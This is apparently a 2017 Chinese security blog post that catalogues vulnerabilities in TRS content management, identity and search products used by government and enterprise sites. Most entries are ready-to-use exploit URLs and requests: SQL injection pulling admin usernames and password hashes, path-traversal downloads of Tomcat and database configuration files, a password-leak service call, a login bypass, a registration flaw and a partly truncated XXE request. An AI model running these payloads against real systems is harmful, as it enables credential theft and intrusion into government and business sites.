http://reboot.cf/2017/01/12/2017/TRS%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86/
TRS漏洞整理
** 发表于 2017-01-12
TRS北京拓尔思信息技术股份有限公司,其业务系统主要应用于政府、教育、企业等领域,漏洞较多系统有WCM(内容管理系统)、WAS(文本检索系统)、IDS(身份管理系统)。好多客户用到这个,记录一下。
WCM内容管理系统
WCM5.2~WCM6.5存在SQL注入首先是这个页面,http://xx.xx.xx/portal/db/dbupdatelog_list.jsp直接注入
1
2
3
http://agent.trs.cn/portal/db/db ... &OrderType=desc;//update//WCMDBUPDATELOG//set//LogTitle=%28select//top//1//UserName%2bPassWord//from//WCMUSER%29//where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG
http://agent.trs.cn/portal/db/db ... &OrderType=desc;//update//WCMDBUPDATELOG//set//LogTitle=%28select//top//1//UserName%2bPassWord//from//WCMUSER%29//where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG
注:存在注入参数为:OrderType 和 OrderField
WCM任意文件下载漏洞
漏洞存在于wcm/app/system/read_image.jsp读取上传图片功能处,可构造链接下载任意文件,列如
1
http://xx.xx.xx/wcm/app/system/read_image.jsp?Filename=../../../tomcat/conf/tomcat-users.xml
读取tomcat配置文件
WCM6.x系列用户密码泄漏
TRS WCM 6.0以上版本某个功能页面调用service限制不严格,可以获取后台管理用户的用户名和密码序列。访问链接:
1
HTTP://xx.xx.xx/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers
WCM的密码加密方式是:常规32位MD5取前15位;如果只访问wcm/infoview.do,尽管是个错误页面,比如:首先访问
1
http://xx.xx.xx/wcm/infoview.do
然后你再访问:
1
http://xx.xx.xx/wcm
WCM用户注册逻辑漏洞问题出在wcm/console/auth/reg_newuser.jsp文件中即将随意表单改成STATUS值为30,或增加STATUS字段表单。然后提交注册虽然说是“请等待开通!”,但实际上已经开通了,因为STATUS字段已经改成正常了。直接登陆虽然没什么权限,但后台存在大量注入等漏洞可以通过注入直接操作数据库了。
1
http://localhost:9999/wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx
直接下载数据库配置文件
WCM6权限绕过
首先访问wcm目录,会自动跳转到登录页面在网址后加上查看管理员密码的链接:
1
wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin
*之前的漏洞说查看管理员信息的危害不大是因为MD5加密只取半截,并且即使破解还有可能遇到admin账号未启用的问题这时我们点击浏览器的后退按钮或在地址栏的网址后面直接输入wcm/app/login.jsp,这样就绕过权限登录了
WCM全版本任意文件写入漏洞
这个是16年年初出的漏洞,当初还给北京做过一次排查。是利用webservices的importDocuments接口匿名访问,加上畸形文件名进行利用,exp下载
IDS身份管理系统
IDS系统任意文件读取和信息泄露漏洞漏洞文件路径在admin/debug/目录下,读取文件为fv.jsp,信息泄露为env.jsp等,直接访问文件即可
XXE漏洞
使用cloudeye
1
2
3
4
5
6
7
8
9
10
11
12
POST /ids/service?idsServiceType=jitSyncUser HTTP/1.1
Host: ...
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: trsidsssosessionid=2382B8AE9E8FB5B441212CE2595F963E...
X-Forwarded-For: ...
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1988224119974
Content-Length: 196
]>&xxe;
资料:https://www.secpulse.com/archives/49564.html
WAS文本检索系统
WAS未授权访问
安装目录下was40/tree文件可以看到一些后台功能访问was40/passwd/passwd.htm输入一个不存在的用户名会暴露出服务器内网IP地址 同时存在暴力破解用户密码的可能性未授权发布信息+xss编辑信息的时候未对提交的数据进行过滤,同时存在未对用户是否登录进行验证
WAS任意文件读取
问题出在/was5/web/tree文件下,构造路径可以任意读取文件,这个就创宇提的那个漏洞
1
http://xx.xx.xx/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties
WAS任意文件下载漏洞
问题出在was5/admin/template/download_templet.jsp文件下,构造type参数的值可以任意下载文件,
1
http://xx.xx.xx/was5/admin/template/download_templet.jsp?type=../web/tagscloud
WAS任意文件写入
漏洞文件是was5/admin/template/customize/detailcustomize,构造template的参数值进行任意文件写入同理还有一个问题文件/was5/admin/template/customize/outlinecustomize,利用方式一样
# Exploit